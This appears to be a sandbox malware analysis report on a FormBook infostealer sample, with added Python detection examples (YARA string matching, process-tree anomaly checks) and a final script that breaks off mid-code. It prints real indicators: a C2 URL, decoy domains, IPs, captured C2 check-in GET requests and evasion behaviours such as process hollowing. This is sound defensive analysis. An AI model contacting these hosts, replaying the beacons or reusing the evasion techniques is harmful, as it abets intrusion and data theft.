

Windows Analysis Report
8t1uarSZFV.exe

Overview

General Information

Sample name: 8t1uarSZFV.exe (renamed because the original name is a hash value)
Original sample name: b5c54101374cc75a2e4b8960243fbccfe81c267d9e05af3b72e10b2fa812aff5.exe
Analysis ID: 1489361
MD5: 14876f2aecbf08493108d81f260bfe7a
SHA1: ef0dfe01cecc9972141738f251a235059082b106
SHA256: b5c54101374cc75a2e4b8960243fbccfe81c267d9e05af3b72e10b2fa812aff5
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Found API chain indicative of sandbox detection
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Uses netsh to modify the Windows network and firewall settings
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • 8t1uarSZFV.exe (PID: 7292 cmdline: "C:\Users\user\Desktop\8t1uarSZFV.exe" MD5: 14876F2AECBF08493108D81F260BFE7A)
    • svchost.exe (PID: 7312 cmdline: "C:\Users\user\Desktop\8t1uarSZFV.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • netsh.exe (PID: 7396 cmdline: "C:\Windows\SysWOW64\netsh.exe" MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
          • cmd.exe (PID: 7428 cmdline: /c del "C:\Windows\SysWOW64\svchost.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Malware Configuration Extractor: FormBook
{"C2 list": ["www.crucka.xyz/jd21/"], "decoy": ["thepowerofzeus.com", "tampamlr.com", "00050591.xyz", "dominomusicmktlnc.com", "ai-defi.wiki", "tyumk.xyz", "gbqspj.club", "fostertv.net", "batremake.com", "nelwhiteconsulting.com", "amsya.com", "urbanholidayz.com", "463058.photos", "anag-gioielli.com", "kjsdhklssk73.xyz", "islarenta.com", "designed4lifecoaching.com", "autohotelsecrets.com", "susansellsmarin.com", "studyflow.xyz", "xdigistore.cloud", "zaib.art", "cabaiofficial.com", "lpocaxdb.xyz", "suziebujokmarketing.com", "skin-party.com", "maioral-store.com", "stellar-paws.com", "bfutureme.com", "slsmbcxw.xyz", "tech-with-thulitha.site", "kapten69pola.xyz", "carbon.services", "nourishingwithgreens.com", "ye78.top", "15ecm.com", "jeweljuice.store", "fasci.online", "ilovetvs.com", "85742668.com", "arthemis-168bet.site", "shangrilanovel.com", "somitk.online", "uhug.xyz", "dzaipu.com", "freyja.info", "senior-living-64379.bond", "p-afactorysale.shop", "vxjmjnwu.xyz", "fireborn-weldandfab.com", "californiacurrentelectric.com", "mantapnagita777.com", "tltech.xyz", "mrc-lithics.com", "marzottospa.com", "alivioquantico.com", "mercarfi.top", "bougeefilth.com", "suttonjstudio.com", "b2vvuc00.sbs", "pepenem.lol", "71421626.com", "viralvoter.com", "lvinghealthy.com"]}
Source | Rule | Description | Author | Strings
00000003.00000002.4143896558.0000000000E50000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000003.00000002.4143896558.0000000000E50000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000003.00000002.4143896558.0000000000E50000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
  • 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000003.00000002.4143896558.0000000000E50000.00000004.00000800.00020000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.4143896558.0000000000E50000.00000004.00000800.00020000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18839:$sqlite3step: 68 34 1C 7B E1
  • 0x1894c:$sqlite3step: 68 34 1C 7B E1
  • 0x18868:$sqlite3text: 68 38 2A 90 C5
  • 0x1898d:$sqlite3text: 68 38 2A 90 C5
  • 0x1887b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
(list truncated here; the full report lists 33 entries for this source)
Source | Rule | Description | Author | Strings
1.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
1.2.svchost.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x5451:$a1: 3C 30 50 4F 53 54 74 09 40
  • 0x1bdb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x9bbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x14aa7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
1.2.svchost.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.svchost.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x17a39:$sqlite3step: 68 34 1C 7B E1
  • 0x17b4c:$sqlite3step: 68 34 1C 7B E1
  • 0x17a68:$sqlite3text: 68 38 2A 90 C5
  • 0x17b8d:$sqlite3text: 68 38 2A 90 C5
  • 0x17a7b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x17ba3:$sqlite3blob: 68 53 D8 7F 8C
(list truncated here; the full report lists 15 entries for this source)
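The two rule tables above list the byte sequences the community YARA rules matched, with their offsets in the memory dump and in the unpacked svchost.exe image (the same strings sit 0xE00 bytes apart in the two views, i.e. the dump includes the PE header and section padding). Each of the JPCERT/CC strings is a five-byte `push imm32` (opcode 68); their names indicate they are hashed sqlite3 API names, and `50 4F 53 54` inside $a1 is ASCII "POST". The following Python is an added example, not part of the report or of any of the rule sets: a minimal YARA-style hex matcher that compiles those strings into byte regexes (with `??` wildcards), scans a constructed buffer in which a few of them are planted at known offsets, and decodes the push immediates. The real rules' conditions are not shown on the page, so the `required` count in `rule_matches` is a placeholder.

```python
import re

# Hex strings exactly as listed in the rule tables above.
ELASTIC_FORMBOOK = {
    "$a1": "3C 30 50 4F 53 54 74 09 40",
    "$a2": "74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55",
    "$a3": "1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01",
    "$a4": "04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83",
}
JPCERT_FORMBOOK = {
    "$sqlite3step": "68 34 1C 7B E1",
    "$sqlite3text": "68 38 2A 90 C5",
    "$sqlite3blob": "68 53 D8 7F 8C",
}


def hex_to_regex(pattern: str) -> re.Pattern:
    """Compile a YARA-style hex string ('??' = any single byte) into a bytes regex."""
    parts = [b"." if tok == "??" else re.escape(bytes.fromhex(tok)) for tok in pattern.split()]
    return re.compile(b"".join(parts), re.DOTALL)


def scan(buf: bytes, strings: dict) -> dict:
    """Offsets of every string that occurs in buf, keyed by string name (YARA-style report)."""
    hits = {}
    for name, pat in strings.items():
        offs = [m.start() for m in hex_to_regex(pat).finditer(buf)]
        if offs:
            hits[name] = offs
    return hits


def rule_matches(hits: dict, required: int) -> bool:
    """'N of them' condition. Placeholder: the real rules' conditions are not on the page."""
    return len(hits) >= required


def push_imm32(pattern: str):
    """Immediate operand of a 'push imm32' (opcode 0x68) string, or None if it is not one."""
    raw = bytes.fromhex(pattern)
    if len(raw) == 5 and raw[0] == 0x68:
        return int.from_bytes(raw[1:], "little")
    return None


def build_sample() -> bytes:
    """Constructed buffer: NOP filler with some of the strings planted at known offsets."""
    buf = bytearray(b"\x90" * 0x400)
    for off, pat in [(0x10, ELASTIC_FORMBOOK["$a1"]), (0x80, ELASTIC_FORMBOOK["$a3"]),
                     (0x100, JPCERT_FORMBOOK["$sqlite3step"]),
                     (0x200, JPCERT_FORMBOOK["$sqlite3step"]),
                     (0x300, JPCERT_FORMBOOK["$sqlite3blob"])]:
        raw = bytes.fromhex(pat)
        buf[off:off + len(raw)] = raw
    return bytes(buf)


if __name__ == "__main__":
    sample = build_sample()
    for rule, strings in (("Windows_Trojan_Formbook", ELASTIC_FORMBOOK),
                          ("Formbook (JPCERT/CC)", JPCERT_FORMBOOK)):
        hits = scan(sample, strings)
        print(rule, {k: [hex(o) for o in v] for k, v in hits.items()}, rule_matches(hits, 2))
    print(hex(push_imm32(JPCERT_FORMBOOK["$sqlite3step"])))
```

Run it against a real dump by replacing `build_sample()` with the file contents; the offsets it prints are comparable to the ones in the tables above. Note that `finditer` reports non-overlapping matches only, which is also why the same $sqlite3step string is listed twice in the report: it occurs at two separate call sites.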

          System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\8t1uarSZFV.exe", CommandLine: "C:\Users\user\Desktop\8t1uarSZFV.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\8t1uarSZFV.exe", ParentImage: C:\Users\user\Desktop\8t1uarSZFV.exe, ParentProcessId: 7292, ParentProcessName: 8t1uarSZFV.exe, ProcessCommandLine: "C:\Users\user\Desktop\8t1uarSZFV.exe", ProcessId: 7312, ProcessName: svchost.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\8t1uarSZFV.exe", CommandLine: "C:\Users\user\Desktop\8t1uarSZFV.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\8t1uarSZFV.exe", ParentImage: C:\Users\user\Desktop\8t1uarSZFV.exe, ParentProcessId: 7292, ParentProcessName: 8t1uarSZFV.exe, ProcessCommandLine: "C:\Users\user\Desktop\8t1uarSZFV.exe", ProcessId: 7312, ProcessName: svchost.exe
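The process tree and the two Sigma hits above carry several anomalies that are easy to detect from process-creation telemetry alone: a svchost.exe (PID 7312) whose parent is an executable on the user's desktop rather than services.exe, a command line that names a different executable than the process image (the hollowed host that the "Sample uses process hollowing technique" signature refers to), netsh.exe spawning cmd.exe, and cmd.exe deleting a binary under C:\Windows\SysWOW64. explorer.exe (PID 2580) is the pre-existing shell; the sandbox most likely nests it under svchost.exe because of the injection into it that the signatures flag, not because svchost.exe started it. Below is an added Python example, not part of the Joe Sandbox report, that runs those four checks over process-creation events constructed from the tree above. The cmd.exe image path and the root process's parent (ppid 0) are assumptions, since the page gives only hashes there, and the svchost parent allow-list is a shortened stand-in for the exclusions in the Sigma rule, not its exact list.

```python
import ntpath
import re

# Process-creation events constructed from the process tree in the report. The cmd.exe image
# path and the root process's parent (ppid 0) are assumptions; the page gives only hashes there.
EVENTS = [
    {"pid": 7292, "ppid": 0, "image": r"C:\Users\user\Desktop\8t1uarSZFV.exe",
     "cmdline": r'"C:\Users\user\Desktop\8t1uarSZFV.exe"'},
    {"pid": 7312, "ppid": 7292, "image": r"C:\Windows\SysWOW64\svchost.exe",
     "cmdline": r'"C:\Users\user\Desktop\8t1uarSZFV.exe"'},
    {"pid": 2580, "ppid": 7312, "image": r"C:\Windows\explorer.exe",
     "cmdline": r"C:\Windows\Explorer.EXE"},
    {"pid": 7396, "ppid": 2580, "image": r"C:\Windows\SysWOW64\netsh.exe",
     "cmdline": r'"C:\Windows\SysWOW64\netsh.exe"'},
    {"pid": 7428, "ppid": 7396, "image": r"C:\Windows\SysWOW64\cmd.exe",   # path assumed
     "cmdline": r'/c del "C:\Windows\SysWOW64\svchost.exe"'},
    {"pid": 7436, "ppid": 7428, "image": r"C:\Windows\system32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
]

# Parents under which svchost.exe is expected. Shortened stand-in for the exclusion list of
# the Sigma rule "Uncommon Svchost Parent Process" (assumption, not the rule's exact list).
SVCHOST_PARENTS_OK = {"services.exe", "msmpeng.exe", "mrt.exe", "rpcnet.exe", "svchost.exe"}
WINDOWS_BIN_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def basename(path: str) -> str:
    return ntpath.basename(path).lower()


def first_token(cmdline: str) -> str:
    """argv[0] of a Windows command line, honouring a leading quoted path."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        return cmdline[1:end] if end > 0 else cmdline[1:]
    return cmdline.split(" ", 1)[0]


def ancestry(events, pid):
    """Image basenames from pid up to the root, e.g. cmd.exe -> netsh.exe -> explorer.exe ..."""
    by_pid = {e["pid"]: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain


def detect(events):
    """(pid, rule_name) pairs for every event that trips one of the four checks."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        img = basename(e["image"])
        parent = by_pid.get(e["ppid"])
        pimg = basename(parent["image"]) if parent else ""
        # 1. svchost.exe started by something other than its usual parents.
        if img == "svchost.exe" and pimg not in SVCHOST_PARENTS_OK:
            findings.append((e["pid"], "uncommon_svchost_parent"))
        # 2. argv[0] names a different executable than the process image (hollowed host).
        tok = first_token(e["cmdline"])
        looks_like_path = "\\" in tok or tok.lower().endswith(".exe")
        if looks_like_path and basename(tok) != img:
            findings.append((e["pid"], "image_cmdline_mismatch"))
        # 3. netsh.exe has no business launching a shell.
        if img == "cmd.exe" and pimg == "netsh.exe":
            findings.append((e["pid"], "netsh_spawns_cmd"))
        # 4. cmd.exe deleting a file out of the Windows binary directories.
        m = re.search(r'\bdel\s+"?([^"]+)"?', e["cmdline"], re.IGNORECASE)
        if img == "cmd.exe" and m and m.group(1).strip().lower().startswith(WINDOWS_BIN_DIRS):
            findings.append((e["pid"], "deletes_windows_binary"))
    return findings


if __name__ == "__main__":
    for pid, rule in detect(EVENTS):
        print(pid, rule, " <- ".join(ancestry(EVENTS, pid)))
```

Checks 1 and 2 fire on the same process (7312), which is the combination worth alerting on: an unexpected svchost.exe parent alone is noisy on real estates, but an svchost.exe whose command line is a user-writable .exe is not something legitimate software produces.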
IDS alerts (all SID 2031453, severity 1, TCP to destination port 80, classtype: Malware Command and Control Activity Detected):
  2024-08-07T12:47:40.875845+0200  source port 49736
  2024-08-07T12:49:42.895880+0200  source port 49740
  2024-08-07T12:51:05.923753+0200  source port 49741
  2024-08-07T12:46:56.400874+0200  source port 49739
  2024-08-07T12:48:01.173402+0200  source port 49738


          AV Detection

Source: 00000003.00000002.4143896558.0000000000E50000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: FormBook (C2 list and decoy list as given in the configuration above: C2 www.crucka.xyz/jd21/, 64 decoy domains)
Source: kevintomc.github.io | Virustotal: Detection: 9%
Source: 8t1uarSZFV.exe | ReversingLabs: Detection: 55%
Source: 8t1uarSZFV.exe | Virustotal: Detection: 47%
Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.8t1uarSZFV.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.8t1uarSZFV.exe.f10000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.4143896558.0000000000E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1763621828.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4143556065.0000000000940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1763854719.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1708200565.0000000000F10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4143849361.0000000000E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1763894403.0000000000D70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: 8t1uarSZFV.exe | Joe Sandbox ML: detected
Source: 8t1uarSZFV.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: Binary string: netsh.pdb source: svchost.exe, 00000001.00000003.1763030810.000000000081C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1763924348.0000000000DA0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000001.00000003.1763030810.000000000082C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1763312618.000000000082F000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, netsh.exe, 00000003.00000002.4144354382.0000000001560000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: 8t1uarSZFV.exe, 00000000.00000003.1698054336.0000000003980000.00000004.00001000.00020000.00000000.sdmp, 8t1uarSZFV.exe, 00000000.00000003.1695143859.00000000037E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1764253013.000000000313E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1764253013.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1704028607.0000000000C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1699679609.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000003.00000002.4144443871.000000000371E000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000003.00000003.1765272710.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000003.00000002.4144443871.0000000003580000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000003.00000003.1763738242.0000000000F21000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: netsh.pdbGCTL source: svchost.exe, 00000001.00000003.1763030810.000000000081C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1763924348.0000000000DA0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000001.00000003.1763030810.000000000082C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1763312618.000000000082F000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000003.00000002.4144354382.0000000001560000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: 8t1uarSZFV.exe, 00000000.00000003.1698054336.0000000003980000.00000004.00001000.00020000.00000000.sdmp, 8t1uarSZFV.exe, 00000000.00000003.1695143859.00000000037E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1764253013.000000000313E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1764253013.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1704028607.0000000000C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1699679609.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, netsh.exe, 00000003.00000002.4144443871.000000000371E000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000003.00000003.1765272710.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000003.00000002.4144443871.0000000003580000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000003.00000003.1763738242.0000000000F21000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: svchost.pdb source: explorer.exe, 00000002.00000002.4160740233.0000000010DBF000.00000004.80000000.00040000.00000000.sdmp, netsh.exe, 00000003.00000002.4143745719.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000003.00000002.4144970692.0000000003ACF000.00000004.10000000.00040000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: explorer.exe, 00000002.00000002.4160740233.0000000010DBF000.00000004.80000000.00040000.00000000.sdmp, netsh.exe, 00000003.00000002.4143745719.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000003.00000002.4144970692.0000000003ACF000.00000004.10000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_0100DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_0101698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime
Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_010168EE FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_0100D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_0100D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_0101979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_01019642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_01019B2B FindFirstFileW,Sleep,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_01015C97 FindFirstFileW,FindNextFileW,FindClose

          Networking

Source: C:\Windows\explorer.exe | Network Connect: 65.21.196.90:80
Source: C:\Windows\explorer.exe | Network Connect: 66.235.200.145:80
Source: Malware configuration extractor | URLs: www.crucka.xyz/jd21/
          Source: DNS query: www.00050591.xyz
          Source: DNS query: www.crucka.xyz
Source: global traffic | HTTP traffic detected: GET /jd21/?4h6=+5nsDbzeU2p9U7f/EDv04YNxDKhKydlr4qi/vE56uC3vG/MRVEljVAr+s/LnjHWqip0u&tT=MHNp HTTP/1.1 | Host: www.00050591.xyz | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (seven NUL bytes, non-printable)
Source: global traffic | HTTP traffic detected: GET /jd21/?4h6=TcnzKU037ptQb8KtMr1qWerDm92/juweqwVgTbR+hogZZVjE2Gm2LVJlLe3KP85noDUE&tT=MHNp HTTP/1.1 | Host: www.californiacurrentelectric.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (seven NUL bytes, non-printable)
Source: Joe Sandbox View | IP Address: 66.235.200.145
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | ASN Name: CP-ASDE
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (11 occurrences)
Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_0101CF1A InternetQueryDataAvailable,InternetReadFile,GetLastError,SetEvent,SetEvent
Source: global traffic | DNS traffic detected: DNS query: www.00050591.xyz
Source: global traffic | DNS traffic detected: DNS query: www.californiacurrentelectric.com
Source: global traffic | DNS traffic detected: DNS query: www.b2vvuc00.sbs
Source: global traffic | DNS traffic detected: DNS query: www.susansellsmarin.com
Source: global traffic | DNS traffic detected: DNS query: www.urbanholidayz.com
Source: global traffic | DNS traffic detected: DNS query: www.batremake.com
Source: global traffic | DNS traffic detected: DNS query: www.crucka.xyz
Source: global traffic | DNS traffic detected: DNS query: www.tech-with-thulitha.site
Source: global traffic | DNS traffic detected: DNS query: www.fostertv.net
Source: global traffic | DNS traffic detected: DNS query: www.p-afactorysale.shop
Source: global traffic | DNS traffic detected: DNS query: www.arthemis-168bet.site
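The Networking findings above show the FormBook check-in pattern end to end: the injected explorer.exe walks the configured domain list, resolving and contacting decoys (www.00050591.xyz, www.californiacurrentelectric.com, ...) as well as the one real C2 (www.crucka.xyz), and each request is a GET to the configured path /jd21/ with a two-parameter query, no User-Agent, Connection: close, and a few NUL bytes after the headers (which is what the "HTTP GET or POST without a user agent" signature and the port-80 IDS alerts are reacting to). The following Python is an added example, not part of the Joe Sandbox report: it cross-references the observed DNS queries against the extracted configuration to separate the C2 from the decoys, and scores raw HTTP requests (reconstructed from the two captured GETs above, plus one constructed benign request for contrast) against those traits. The decoy list is a subset of the 64 entries in the report; the trait threshold and the query regex are my own heuristics, not a published rule.

```python
import re
from urllib.parse import urlsplit

# Extracted configuration from the report (the decoy list here is a subset of the 64 entries).
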